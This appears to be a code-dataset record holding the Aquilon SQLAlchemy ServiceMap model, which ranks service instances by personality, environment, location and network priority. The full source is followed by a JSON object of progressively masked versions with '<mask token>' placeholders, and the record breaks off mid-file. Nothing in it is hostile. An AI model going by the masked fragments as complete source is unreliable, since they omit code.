q = q.options(contains_eager('service_instance'), defer(
'service_instance.comments'), undefer(
'service_instance._client_count'), lazyload(
'service_instance.service'))
instance_cache = {}
instance_priority = defaultdict(lambda : (maxsize,))
for map in q:
si = map.service_instance
service = si.service
if instance_priority[service] > map.priority:
instance_cache[service] = [si]
instance_priority[service] = map.priority
elif instance_priority[service] == map.priority:
instance_cache[service].append(si)
return instance_cache
<|reserved_special_token_1|>
# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2008,2009,2010,2011,2012,2013,2014,2015,2016 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Maps service instances to locations. See class.__doc__ """
from collections import defaultdict
from datetime import datetime
from sys import maxsize
from sqlalchemy import (Column, Integer, Sequence, DateTime, ForeignKey,
UniqueConstraint, CheckConstraint)
from sqlalchemy.orm import (relation, deferred, backref, defer, undefer,
lazyload, contains_eager, object_session)
from sqlalchemy.sql import and_, or_, null, case
from sqlalchemy.sql.functions import coalesce
from aquilon.exceptions_ import InternalError, AquilonError
from aquilon.aqdb.model import (Base, Location, Desk, Rack, Room, Bunker,
Building, City, Campus, Country, Continent, Hub,
Organization, ServiceInstance, Network, Personality,
PersonalityServiceListItem, HostEnvironment)
_TN = 'service_map'
# TODO: We could calculate this map by building a graph of Location subclasses
# using Location.valid_parents as edges, and then doing a topological sort
# NOTE: The actual values here are unimportant, what matters is their order
_LOCATION_PRIORITY = {
# Rack and Desk are at the same level
Rack: 1000,
Desk: 1000,
Room: 1100,
Bunker: 1200,
Building: 1300,
City: 1400,
Campus: 1500,
Country: 1600,
Continent: 1700,
Hub: 1800,
Organization: 1900,
}
# NOTE: The actual value here is unimportant, what matters is the order wrt.
# location-based priorities
_NETWORK_PRIORITY = 100
# NOTE: The actual values here are unimportant, only their order matters
_TARGET_PERSONALITY = 10
_TARGET_ENVIRONMENT = 100
_TARGET_GLOBAL = 1000
class ServiceMap(Base):
""" Service Map: mapping a service_instance to a location.
The rows in this table assert that an instance is a valid useable
default that clients can choose as their provider during service
autoconfiguration.
The contained information is actually a triplet:
- The service instance to use,
- Rules for the scope where the map is valid,
- Rules for which objects does the map apply.
"""
__tablename__ = _TN
id = Column(Integer, Sequence('%s_id_seq' % _TN), primary_key=True)
service_instance_id = Column(ForeignKey(ServiceInstance.id,
ondelete='CASCADE'),
nullable=False)
personality_id = Column(ForeignKey(Personality.id, ondelete='CASCADE'),
nullable=True, index=True)
host_environment_id = Column(ForeignKey(HostEnvironment.id), nullable=True)
location_id = Column(ForeignKey(Location.id, ondelete='CASCADE'),
nullable=True, index=True)
network_id = Column(ForeignKey(Network.id, ondelete='CASCADE'),
nullable=True, index=True)
creation_date = deferred(Column(DateTime, default=datetime.now,
nullable=False))
service_instance = relation(ServiceInstance, innerjoin=True,
backref=backref('service_map',
cascade="all, delete-orphan",
passive_deletes=True))
personality = relation(Personality)
host_environment = relation(HostEnvironment)
location = relation(Location)
network = relation(Network)
__table_args__ = (UniqueConstraint(service_instance_id,
personality_id, host_environment_id,
location_id, network_id,
name='%s_uk' % _TN),
# At most one of personality_id and host_environment_id
# can be not NULL
CheckConstraint(case([(personality_id != null(), 1)], else_=0) +
case([(host_environment_id != null(), 1)], else_=0) <= 1,
name='%s_target_ck' % _TN))
@property
def service(self):
return self.service_instance.service
@property
def scope_priority(self):
if self.network:
return _NETWORK_PRIORITY
else:
try:
return _LOCATION_PRIORITY[type(self.location)]
except KeyError: # pragma: no cover
raise InternalError("The service map is not prepared to handle "
"location class %r" % type(self.location))
@property
def object_priority(self):
if self.personality:
return _TARGET_PERSONALITY
elif self.host_environment:
return _TARGET_ENVIRONMENT
else:
return _TARGET_GLOBAL
@property
def priority(self):
return (self.object_priority, self.scope_priority)
@property
def scope(self):
if self.location:
return self.location
else:
return self.network
def __init__(self, service_instance, network=None, location=None, personality=None,
host_environment=None):
if network and location: # pragma: no cover
raise AquilonError("A service can't be mapped to a Network and a "
"Location at the same time")
if network is None and location is None: # pragma: no cover
raise AquilonError("A service should by mapped to a Network or a "
"Location")
if personality and host_environment: # pragma: no cover
raise AquilonError("A service can't be mapped to a Personality and "
"a HostEnvironment at the same time")
super(ServiceMap, self).__init__(service_instance=service_instance,
network=network, location=location,
personality=personality,
host_environment=host_environment)
@staticmethod
def get_location_mapped_instances(dbservice, dblocation):
# Simplified service map lookup - single service, location-based maps
# only, no client bindings
session = object_session(dbservice)
location_ids = [loc.id for loc in dblocation.parents]
location_ids.append(dblocation.id)
q = session.query(ServiceMap)
q = q.filter(and_(ServiceMap.personality_id == null(),
ServiceMap.host_environment_id == null()))
q = q.filter(ServiceMap.location_id.in_(location_ids))
q = q.join(ServiceInstance)
q = q.filter_by(service=dbservice)
q = q.options(contains_eager('service_instance'),
defer('service_instance.comments'),
lazyload('service_instance.service'))
instances = []
min_seen_priority = (maxsize,)
# We want the instance(s) with the lowest priority
for map in q:
si = map.service_instance
if min_seen_priority > map.priority:
instances = [si]
min_seen_priority = map.priority
elif min_seen_priority == map.priority:
instances.append(si)
return instances
@staticmethod
def get_mapped_instance_cache(dbservices, dbstage, dblocation,
dbnetwork=None):
"""Returns dict of requested services to closest mapped instances."""
session = object_session(dblocation)
location_ids = [loc.id for loc in dblocation.parents]
location_ids.append(dblocation.id)
PSLI = PersonalityServiceListItem
q = session.query(ServiceMap)
q = q.join(ServiceInstance)
q = q.filter(ServiceInstance.service_id.in_(srv.id for srv in dbservices))
q = q.outerjoin(PSLI, and_(PSLI.personality_stage_id == dbstage.id,
PSLI.service_id == ServiceInstance.service_id))
# Rules for filtering by target object
q = q.filter(or_(
and_(ServiceMap.personality_id == null(),
ServiceMap.host_environment_id == null()),
ServiceMap.personality == dbstage.personality,
ServiceMap.host_environment_id == coalesce(
PSLI.host_environment_id,
dbstage.personality.host_environment.id)))
# Rules for filtering by location/scope
if dbnetwork:
q = q.filter(or_(ServiceMap.location_id.in_(location_ids),
ServiceMap.network_id == dbnetwork.id))
else:
q = q.filter(ServiceMap.location_id.in_(location_ids))
q = q.options(contains_eager('service_instance'),
defer('service_instance.comments'),
undefer('service_instance._client_count'),
lazyload('service_instance.service'))
instance_cache = {}
instance_priority = defaultdict(lambda: (maxsize,))
# For every service, we want the instance(s) with the lowest priority
for map in q:
si = map.service_instance
service = si.service
if instance_priority[service] > map.priority:
instance_cache[service] = [si]
instance_priority[service] = map.priority
elif instance_priority[service] == map.priority:
instance_cache[service].append(si)
return instance_cache
|
flexible
|
{
"blob_id": "a9e0659c6a18ffc954079845b7d0de04c46a78c9",
"index": 7204,
"step-1": "<mask token>\n\n\nclass ServiceMap(Base):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @property\n def service(self):\n return self.service_instance.service\n\n @property\n def scope_priority(self):\n if self.network:\n return _NETWORK_PRIORITY\n else:\n try:\n return _LOCATION_PRIORITY[type(self.location)]\n except KeyError:\n raise InternalError(\n 'The service map is not prepared to handle location class %r'\n % type(self.location))\n\n @property\n def object_priority(self):\n if self.personality:\n return _TARGET_PERSONALITY\n elif self.host_environment:\n return _TARGET_ENVIRONMENT\n else:\n return _TARGET_GLOBAL\n\n @property\n def priority(self):\n return self.object_priority, self.scope_priority\n\n @property\n def scope(self):\n if self.location:\n return self.location\n else:\n return self.network\n\n def __init__(self, service_instance, network=None, location=None,\n personality=None, host_environment=None):\n if network and location:\n raise AquilonError(\n \"A service can't be mapped to a Network and a Location at the same time\"\n )\n if network is None and location is None:\n raise AquilonError(\n 'A service should by mapped to a Network or a Location')\n if personality and host_environment:\n raise AquilonError(\n \"A service can't be mapped to a Personality and a HostEnvironment at the same time\"\n )\n super(ServiceMap, self).__init__(service_instance=service_instance,\n network=network, location=location, personality=personality,\n host_environment=host_environment)\n\n @staticmethod\n def get_location_mapped_instances(dbservice, dblocation):\n session = object_session(dbservice)\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n q = session.query(ServiceMap)\n q = q.filter(and_(ServiceMap.personality_id == null(), ServiceMap.\n host_environment_id == null()))\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n q = q.join(ServiceInstance)\n q = q.filter_by(service=dbservice)\n q = q.options(contains_eager('service_instance'), defer(\n 'service_instance.comments'), lazyload('service_instance.service'))\n instances = []\n min_seen_priority = maxsize,\n for map in q:\n si = map.service_instance\n if min_seen_priority > map.priority:\n instances = [si]\n min_seen_priority = map.priority\n elif min_seen_priority == map.priority:\n instances.append(si)\n return instances\n\n @staticmethod\n def get_mapped_instance_cache(dbservices, dbstage, dblocation,\n dbnetwork=None):\n \"\"\"Returns dict of requested services to closest mapped instances.\"\"\"\n session = object_session(dblocation)\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n PSLI = PersonalityServiceListItem\n q = session.query(ServiceMap)\n q = q.join(ServiceInstance)\n q = q.filter(ServiceInstance.service_id.in_(srv.id for srv in\n dbservices))\n q = q.outerjoin(PSLI, and_(PSLI.personality_stage_id == dbstage.id,\n PSLI.service_id == ServiceInstance.service_id))\n q = q.filter(or_(and_(ServiceMap.personality_id == null(), \n ServiceMap.host_environment_id == null()), ServiceMap.\n personality == dbstage.personality, ServiceMap.\n host_environment_id == coalesce(PSLI.host_environment_id,\n dbstage.personality.host_environment.id)))\n if dbnetwork:\n q = q.filter(or_(ServiceMap.location_id.in_(location_ids), \n ServiceMap.network_id == dbnetwork.id))\n else:\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n q = q.options(contains_eager('service_instance'), defer(\n 'service_instance.comments'), undefer(\n 'service_instance._client_count'), lazyload(\n 'service_instance.service'))\n instance_cache = {}\n instance_priority = defaultdict(lambda : (maxsize,))\n for map in q:\n si = map.service_instance\n service = si.service\n if instance_priority[service] > map.priority:\n instance_cache[service] = [si]\n instance_priority[service] = map.priority\n elif instance_priority[service] == map.priority:\n instance_cache[service].append(si)\n return instance_cache\n",
"step-2": "<mask token>\n\n\nclass ServiceMap(Base):\n <mask token>\n __tablename__ = _TN\n id = Column(Integer, Sequence('%s_id_seq' % _TN), primary_key=True)\n service_instance_id = Column(ForeignKey(ServiceInstance.id, ondelete=\n 'CASCADE'), nullable=False)\n personality_id = Column(ForeignKey(Personality.id, ondelete='CASCADE'),\n nullable=True, index=True)\n host_environment_id = Column(ForeignKey(HostEnvironment.id), nullable=True)\n location_id = Column(ForeignKey(Location.id, ondelete='CASCADE'),\n nullable=True, index=True)\n network_id = Column(ForeignKey(Network.id, ondelete='CASCADE'),\n nullable=True, index=True)\n creation_date = deferred(Column(DateTime, default=datetime.now,\n nullable=False))\n service_instance = relation(ServiceInstance, innerjoin=True, backref=\n backref('service_map', cascade='all, delete-orphan',\n passive_deletes=True))\n personality = relation(Personality)\n host_environment = relation(HostEnvironment)\n location = relation(Location)\n network = relation(Network)\n __table_args__ = UniqueConstraint(service_instance_id, personality_id,\n host_environment_id, location_id, network_id, name='%s_uk' % _TN\n ), CheckConstraint(case([(personality_id != null(), 1)], else_=0) +\n case([(host_environment_id != null(), 1)], else_=0) <= 1, name=\n '%s_target_ck' % _TN)\n\n @property\n def service(self):\n return self.service_instance.service\n\n @property\n def scope_priority(self):\n if self.network:\n return _NETWORK_PRIORITY\n else:\n try:\n return _LOCATION_PRIORITY[type(self.location)]\n except KeyError:\n raise InternalError(\n 'The service map is not prepared to handle location class %r'\n % type(self.location))\n\n @property\n def object_priority(self):\n if self.personality:\n return _TARGET_PERSONALITY\n elif self.host_environment:\n return _TARGET_ENVIRONMENT\n else:\n return _TARGET_GLOBAL\n\n @property\n def priority(self):\n return self.object_priority, self.scope_priority\n\n @property\n def scope(self):\n if self.location:\n return self.location\n else:\n return self.network\n\n def __init__(self, service_instance, network=None, location=None,\n personality=None, host_environment=None):\n if network and location:\n raise AquilonError(\n \"A service can't be mapped to a Network and a Location at the same time\"\n )\n if network is None and location is None:\n raise AquilonError(\n 'A service should by mapped to a Network or a Location')\n if personality and host_environment:\n raise AquilonError(\n \"A service can't be mapped to a Personality and a HostEnvironment at the same time\"\n )\n super(ServiceMap, self).__init__(service_instance=service_instance,\n network=network, location=location, personality=personality,\n host_environment=host_environment)\n\n @staticmethod\n def get_location_mapped_instances(dbservice, dblocation):\n session = object_session(dbservice)\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n q = session.query(ServiceMap)\n q = q.filter(and_(ServiceMap.personality_id == null(), ServiceMap.\n host_environment_id == null()))\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n q = q.join(ServiceInstance)\n q = q.filter_by(service=dbservice)\n q = q.options(contains_eager('service_instance'), defer(\n 'service_instance.comments'), lazyload('service_instance.service'))\n instances = []\n min_seen_priority = maxsize,\n for map in q:\n si = map.service_instance\n if min_seen_priority > map.priority:\n instances = [si]\n min_seen_priority = map.priority\n elif min_seen_priority == map.priority:\n instances.append(si)\n return instances\n\n @staticmethod\n def get_mapped_instance_cache(dbservices, dbstage, dblocation,\n dbnetwork=None):\n \"\"\"Returns dict of requested services to closest mapped instances.\"\"\"\n session = object_session(dblocation)\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n PSLI = PersonalityServiceListItem\n q = session.query(ServiceMap)\n q = q.join(ServiceInstance)\n q = q.filter(ServiceInstance.service_id.in_(srv.id for srv in\n dbservices))\n q = q.outerjoin(PSLI, and_(PSLI.personality_stage_id == dbstage.id,\n PSLI.service_id == ServiceInstance.service_id))\n q = q.filter(or_(and_(ServiceMap.personality_id == null(), \n ServiceMap.host_environment_id == null()), ServiceMap.\n personality == dbstage.personality, ServiceMap.\n host_environment_id == coalesce(PSLI.host_environment_id,\n dbstage.personality.host_environment.id)))\n if dbnetwork:\n q = q.filter(or_(ServiceMap.location_id.in_(location_ids), \n ServiceMap.network_id == dbnetwork.id))\n else:\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n q = q.options(contains_eager('service_instance'), defer(\n 'service_instance.comments'), undefer(\n 'service_instance._client_count'), lazyload(\n 'service_instance.service'))\n instance_cache = {}\n instance_priority = defaultdict(lambda : (maxsize,))\n for map in q:\n si = map.service_instance\n service = si.service\n if instance_priority[service] > map.priority:\n instance_cache[service] = [si]\n instance_priority[service] = map.priority\n elif instance_priority[service] == map.priority:\n instance_cache[service].append(si)\n return instance_cache\n",
"step-3": "<mask token>\n\n\nclass ServiceMap(Base):\n \"\"\" Service Map: mapping a service_instance to a location.\n The rows in this table assert that an instance is a valid useable\n default that clients can choose as their provider during service\n autoconfiguration.\n\n The contained information is actually a triplet:\n - The service instance to use,\n - Rules for the scope where the map is valid,\n - Rules for which objects does the map apply.\n \"\"\"\n __tablename__ = _TN\n id = Column(Integer, Sequence('%s_id_seq' % _TN), primary_key=True)\n service_instance_id = Column(ForeignKey(ServiceInstance.id, ondelete=\n 'CASCADE'), nullable=False)\n personality_id = Column(ForeignKey(Personality.id, ondelete='CASCADE'),\n nullable=True, index=True)\n host_environment_id = Column(ForeignKey(HostEnvironment.id), nullable=True)\n location_id = Column(ForeignKey(Location.id, ondelete='CASCADE'),\n nullable=True, index=True)\n network_id = Column(ForeignKey(Network.id, ondelete='CASCADE'),\n nullable=True, index=True)\n creation_date = deferred(Column(DateTime, default=datetime.now,\n nullable=False))\n service_instance = relation(ServiceInstance, innerjoin=True, backref=\n backref('service_map', cascade='all, delete-orphan',\n passive_deletes=True))\n personality = relation(Personality)\n host_environment = relation(HostEnvironment)\n location = relation(Location)\n network = relation(Network)\n __table_args__ = UniqueConstraint(service_instance_id, personality_id,\n host_environment_id, location_id, network_id, name='%s_uk' % _TN\n ), CheckConstraint(case([(personality_id != null(), 1)], else_=0) +\n case([(host_environment_id != null(), 1)], else_=0) <= 1, name=\n '%s_target_ck' % _TN)\n\n @property\n def service(self):\n return self.service_instance.service\n\n @property\n def scope_priority(self):\n if self.network:\n return _NETWORK_PRIORITY\n else:\n try:\n return _LOCATION_PRIORITY[type(self.location)]\n except KeyError:\n raise InternalError(\n 'The service map is not prepared to handle location class %r'\n % type(self.location))\n\n @property\n def object_priority(self):\n if self.personality:\n return _TARGET_PERSONALITY\n elif self.host_environment:\n return _TARGET_ENVIRONMENT\n else:\n return _TARGET_GLOBAL\n\n @property\n def priority(self):\n return self.object_priority, self.scope_priority\n\n @property\n def scope(self):\n if self.location:\n return self.location\n else:\n return self.network\n\n def __init__(self, service_instance, network=None, location=None,\n personality=None, host_environment=None):\n if network and location:\n raise AquilonError(\n \"A service can't be mapped to a Network and a Location at the same time\"\n )\n if network is None and location is None:\n raise AquilonError(\n 'A service should by mapped to a Network or a Location')\n if personality and host_environment:\n raise AquilonError(\n \"A service can't be mapped to a Personality and a HostEnvironment at the same time\"\n )\n super(ServiceMap, self).__init__(service_instance=service_instance,\n network=network, location=location, personality=personality,\n host_environment=host_environment)\n\n @staticmethod\n def get_location_mapped_instances(dbservice, dblocation):\n session = object_session(dbservice)\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n q = session.query(ServiceMap)\n q = q.filter(and_(ServiceMap.personality_id == null(), ServiceMap.\n host_environment_id == null()))\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n q = q.join(ServiceInstance)\n q = q.filter_by(service=dbservice)\n q = q.options(contains_eager('service_instance'), defer(\n 'service_instance.comments'), lazyload('service_instance.service'))\n instances = []\n min_seen_priority = maxsize,\n for map in q:\n si = map.service_instance\n if min_seen_priority > map.priority:\n instances = [si]\n min_seen_priority = map.priority\n elif min_seen_priority == map.priority:\n instances.append(si)\n return instances\n\n @staticmethod\n def get_mapped_instance_cache(dbservices, dbstage, dblocation,\n dbnetwork=None):\n \"\"\"Returns dict of requested services to closest mapped instances.\"\"\"\n session = object_session(dblocation)\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n PSLI = PersonalityServiceListItem\n q = session.query(ServiceMap)\n q = q.join(ServiceInstance)\n q = q.filter(ServiceInstance.service_id.in_(srv.id for srv in\n dbservices))\n q = q.outerjoin(PSLI, and_(PSLI.personality_stage_id == dbstage.id,\n PSLI.service_id == ServiceInstance.service_id))\n q = q.filter(or_(and_(ServiceMap.personality_id == null(), \n ServiceMap.host_environment_id == null()), ServiceMap.\n personality == dbstage.personality, ServiceMap.\n host_environment_id == coalesce(PSLI.host_environment_id,\n dbstage.personality.host_environment.id)))\n if dbnetwork:\n q = q.filter(or_(ServiceMap.location_id.in_(location_ids), \n ServiceMap.network_id == dbnetwork.id))\n else:\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n q = q.options(contains_eager('service_instance'), defer(\n 'service_instance.comments'), undefer(\n 'service_instance._client_count'), lazyload(\n 'service_instance.service'))\n instance_cache = {}\n instance_priority = defaultdict(lambda : (maxsize,))\n for map in q:\n si = map.service_instance\n service = si.service\n if instance_priority[service] > map.priority:\n instance_cache[service] = [si]\n instance_priority[service] = map.priority\n elif instance_priority[service] == map.priority:\n instance_cache[service].append(si)\n return instance_cache\n",
"step-4": "<mask token>\nfrom collections import defaultdict\nfrom datetime import datetime\nfrom sys import maxsize\nfrom sqlalchemy import Column, Integer, Sequence, DateTime, ForeignKey, UniqueConstraint, CheckConstraint\nfrom sqlalchemy.orm import relation, deferred, backref, defer, undefer, lazyload, contains_eager, object_session\nfrom sqlalchemy.sql import and_, or_, null, case\nfrom sqlalchemy.sql.functions import coalesce\nfrom aquilon.exceptions_ import InternalError, AquilonError\nfrom aquilon.aqdb.model import Base, Location, Desk, Rack, Room, Bunker, Building, City, Campus, Country, Continent, Hub, Organization, ServiceInstance, Network, Personality, PersonalityServiceListItem, HostEnvironment\n_TN = 'service_map'\n_LOCATION_PRIORITY = {Rack: 1000, Desk: 1000, Room: 1100, Bunker: 1200,\n Building: 1300, City: 1400, Campus: 1500, Country: 1600, Continent: \n 1700, Hub: 1800, Organization: 1900}\n_NETWORK_PRIORITY = 100\n_TARGET_PERSONALITY = 10\n_TARGET_ENVIRONMENT = 100\n_TARGET_GLOBAL = 1000\n\n\nclass ServiceMap(Base):\n \"\"\" Service Map: mapping a service_instance to a location.\n The rows in this table assert that an instance is a valid useable\n default that clients can choose as their provider during service\n autoconfiguration.\n\n The contained information is actually a triplet:\n - The service instance to use,\n - Rules for the scope where the map is valid,\n - Rules for which objects does the map apply.\n \"\"\"\n __tablename__ = _TN\n id = Column(Integer, Sequence('%s_id_seq' % _TN), primary_key=True)\n service_instance_id = Column(ForeignKey(ServiceInstance.id, ondelete=\n 'CASCADE'), nullable=False)\n personality_id = Column(ForeignKey(Personality.id, ondelete='CASCADE'),\n nullable=True, index=True)\n host_environment_id = Column(ForeignKey(HostEnvironment.id), nullable=True)\n location_id = Column(ForeignKey(Location.id, ondelete='CASCADE'),\n nullable=True, index=True)\n network_id = Column(ForeignKey(Network.id, ondelete='CASCADE'),\n nullable=True, index=True)\n creation_date = deferred(Column(DateTime, default=datetime.now,\n nullable=False))\n service_instance = relation(ServiceInstance, innerjoin=True, backref=\n backref('service_map', cascade='all, delete-orphan',\n passive_deletes=True))\n personality = relation(Personality)\n host_environment = relation(HostEnvironment)\n location = relation(Location)\n network = relation(Network)\n __table_args__ = UniqueConstraint(service_instance_id, personality_id,\n host_environment_id, location_id, network_id, name='%s_uk' % _TN\n ), CheckConstraint(case([(personality_id != null(), 1)], else_=0) +\n case([(host_environment_id != null(), 1)], else_=0) <= 1, name=\n '%s_target_ck' % _TN)\n\n @property\n def service(self):\n return self.service_instance.service\n\n @property\n def scope_priority(self):\n if self.network:\n return _NETWORK_PRIORITY\n else:\n try:\n return _LOCATION_PRIORITY[type(self.location)]\n except KeyError:\n raise InternalError(\n 'The service map is not prepared to handle location class %r'\n % type(self.location))\n\n @property\n def object_priority(self):\n if self.personality:\n return _TARGET_PERSONALITY\n elif self.host_environment:\n return _TARGET_ENVIRONMENT\n else:\n return _TARGET_GLOBAL\n\n @property\n def priority(self):\n return self.object_priority, self.scope_priority\n\n @property\n def scope(self):\n if self.location:\n return self.location\n else:\n return self.network\n\n def __init__(self, service_instance, network=None, location=None,\n personality=None, host_environment=None):\n if network and location:\n raise AquilonError(\n \"A service can't be mapped to a Network and a Location at the same time\"\n )\n if network is None and location is None:\n raise AquilonError(\n 'A service should by mapped to a Network or a Location')\n if personality and host_environment:\n raise AquilonError(\n \"A service can't be mapped to a Personality and a HostEnvironment at the same time\"\n )\n super(ServiceMap, self).__init__(service_instance=service_instance,\n network=network, location=location, personality=personality,\n host_environment=host_environment)\n\n @staticmethod\n def get_location_mapped_instances(dbservice, dblocation):\n session = object_session(dbservice)\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n q = session.query(ServiceMap)\n q = q.filter(and_(ServiceMap.personality_id == null(), ServiceMap.\n host_environment_id == null()))\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n q = q.join(ServiceInstance)\n q = q.filter_by(service=dbservice)\n q = q.options(contains_eager('service_instance'), defer(\n 'service_instance.comments'), lazyload('service_instance.service'))\n instances = []\n min_seen_priority = maxsize,\n for map in q:\n si = map.service_instance\n if min_seen_priority > map.priority:\n instances = [si]\n min_seen_priority = map.priority\n elif min_seen_priority == map.priority:\n instances.append(si)\n return instances\n\n @staticmethod\n def get_mapped_instance_cache(dbservices, dbstage, dblocation,\n dbnetwork=None):\n \"\"\"Returns dict of requested services to closest mapped instances.\"\"\"\n session = object_session(dblocation)\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n PSLI = PersonalityServiceListItem\n q = session.query(ServiceMap)\n q = q.join(ServiceInstance)\n q = q.filter(ServiceInstance.service_id.in_(srv.id for srv in\n dbservices))\n q = q.outerjoin(PSLI, and_(PSLI.personality_stage_id == dbstage.id,\n PSLI.service_id == ServiceInstance.service_id))\n q = q.filter(or_(and_(ServiceMap.personality_id == null(), \n ServiceMap.host_environment_id == null()), ServiceMap.\n personality == dbstage.personality, ServiceMap.\n host_environment_id == coalesce(PSLI.host_environment_id,\n dbstage.personality.host_environment.id)))\n if dbnetwork:\n q = q.filter(or_(ServiceMap.location_id.in_(location_ids), \n ServiceMap.network_id == dbnetwork.id))\n else:\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n q = q.options(contains_eager('service_instance'), defer(\n 'service_instance.comments'), undefer(\n 'service_instance._client_count'), lazyload(\n 'service_instance.service'))\n instance_cache = {}\n instance_priority = defaultdict(lambda : (maxsize,))\n for map in q:\n si = map.service_instance\n service = si.service\n if instance_priority[service] > map.priority:\n instance_cache[service] = [si]\n instance_priority[service] = map.priority\n elif instance_priority[service] == map.priority:\n instance_cache[service].append(si)\n return instance_cache\n",
"step-5": "# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-\n# ex: set expandtab softtabstop=4 shiftwidth=4:\n#\n# Copyright (C) 2008,2009,2010,2011,2012,2013,2014,2015,2016 Contributor\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\" Maps service instances to locations. See class.__doc__ \"\"\"\n\nfrom collections import defaultdict\nfrom datetime import datetime\nfrom sys import maxsize\n\nfrom sqlalchemy import (Column, Integer, Sequence, DateTime, ForeignKey,\n UniqueConstraint, CheckConstraint)\nfrom sqlalchemy.orm import (relation, deferred, backref, defer, undefer,\n lazyload, contains_eager, object_session)\nfrom sqlalchemy.sql import and_, or_, null, case\nfrom sqlalchemy.sql.functions import coalesce\n\nfrom aquilon.exceptions_ import InternalError, AquilonError\nfrom aquilon.aqdb.model import (Base, Location, Desk, Rack, Room, Bunker,\n Building, City, Campus, Country, Continent, Hub,\n Organization, ServiceInstance, Network, Personality,\n PersonalityServiceListItem, HostEnvironment)\n\n_TN = 'service_map'\n\n# TODO: We could calculate this map by building a graph of Location subclasses\n# using Location.valid_parents as edges, and then doing a topological sort\n# NOTE: The actual values here are unimportant, what matters is their order\n_LOCATION_PRIORITY = {\n # Rack and Desk are at the same level\n Rack: 1000,\n Desk: 1000,\n Room: 1100,\n Bunker: 1200,\n Building: 1300,\n City: 1400,\n Campus: 1500,\n Country: 1600,\n Continent: 1700,\n Hub: 1800,\n Organization: 1900,\n}\n\n# NOTE: The actual value here is unimportant, what matters is the order wrt.\n# location-based priorities\n_NETWORK_PRIORITY = 100\n\n# NOTE: The actual values here are unimportant, only their order matters\n_TARGET_PERSONALITY = 10\n_TARGET_ENVIRONMENT = 100\n_TARGET_GLOBAL = 1000\n\n\nclass ServiceMap(Base):\n \"\"\" Service Map: mapping a service_instance to a location.\n The rows in this table assert that an instance is a valid useable\n default that clients can choose as their provider during service\n autoconfiguration.\n\n The contained information is actually a triplet:\n - The service instance to use,\n - Rules for the scope where the map is valid,\n - Rules for which objects does the map apply.\n \"\"\"\n\n __tablename__ = _TN\n\n id = Column(Integer, Sequence('%s_id_seq' % _TN), primary_key=True)\n\n service_instance_id = Column(ForeignKey(ServiceInstance.id,\n ondelete='CASCADE'),\n nullable=False)\n\n personality_id = Column(ForeignKey(Personality.id, ondelete='CASCADE'),\n nullable=True, index=True)\n\n host_environment_id = Column(ForeignKey(HostEnvironment.id), nullable=True)\n\n location_id = Column(ForeignKey(Location.id, ondelete='CASCADE'),\n nullable=True, index=True)\n\n network_id = Column(ForeignKey(Network.id, ondelete='CASCADE'),\n nullable=True, index=True)\n\n creation_date = deferred(Column(DateTime, default=datetime.now,\n nullable=False))\n\n service_instance = relation(ServiceInstance, innerjoin=True,\n backref=backref('service_map',\n cascade=\"all, delete-orphan\",\n passive_deletes=True))\n personality = relation(Personality)\n host_environment = relation(HostEnvironment)\n location = relation(Location)\n network = relation(Network)\n\n __table_args__ = (UniqueConstraint(service_instance_id,\n personality_id, host_environment_id,\n location_id, network_id,\n name='%s_uk' % _TN),\n # At most one of personality_id and host_environment_id\n # can be not NULL\n CheckConstraint(case([(personality_id != null(), 1)], else_=0) +\n case([(host_environment_id != null(), 1)], else_=0) <= 1,\n name='%s_target_ck' % _TN))\n\n @property\n def service(self):\n return self.service_instance.service\n\n @property\n def scope_priority(self):\n if self.network:\n return _NETWORK_PRIORITY\n else:\n try:\n return _LOCATION_PRIORITY[type(self.location)]\n except KeyError: # pragma: no cover\n raise InternalError(\"The service map is not prepared to handle \"\n \"location class %r\" % type(self.location))\n\n @property\n def object_priority(self):\n if self.personality:\n return _TARGET_PERSONALITY\n elif self.host_environment:\n return _TARGET_ENVIRONMENT\n else:\n return _TARGET_GLOBAL\n\n @property\n def priority(self):\n return (self.object_priority, self.scope_priority)\n\n @property\n def scope(self):\n if self.location:\n return self.location\n else:\n return self.network\n\n def __init__(self, service_instance, network=None, location=None, personality=None,\n host_environment=None):\n if network and location: # pragma: no cover\n raise AquilonError(\"A service can't be mapped to a Network and a \"\n \"Location at the same time\")\n\n if network is None and location is None: # pragma: no cover\n raise AquilonError(\"A service should by mapped to a Network or a \"\n \"Location\")\n\n if personality and host_environment: # pragma: no cover\n raise AquilonError(\"A service can't be mapped to a 